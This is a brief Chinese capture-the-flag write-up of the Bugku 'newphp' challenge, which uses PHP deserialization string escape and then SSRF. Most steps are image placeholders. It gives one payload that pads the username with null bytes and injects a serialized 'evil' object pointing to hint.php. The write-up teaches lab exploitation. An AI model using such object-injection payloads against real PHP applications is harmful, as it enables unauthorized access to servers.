【bugku】-newphp

可以看这篇文章

考点:PHP序列化逃逸+ssrf

1、 审代码

在这里插入图片描述

2、 PHP反序列化字符串逃逸的条件:先进行序列化,再进行字符串替换。

在这里插入图片描述
所以需要反序列化出一个evil()类。而字符串逃逸可以。

浅析php反序列化字符串逃逸

3、 思路

在这里插入图片描述

4、 payload

username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=a";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}

在这里插入图片描述

5、 base64解码

在这里插入图片描述
在这里插入图片描述

6、 访问

在这里插入图片描述

7、 ssrf

在这里插入图片描述


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部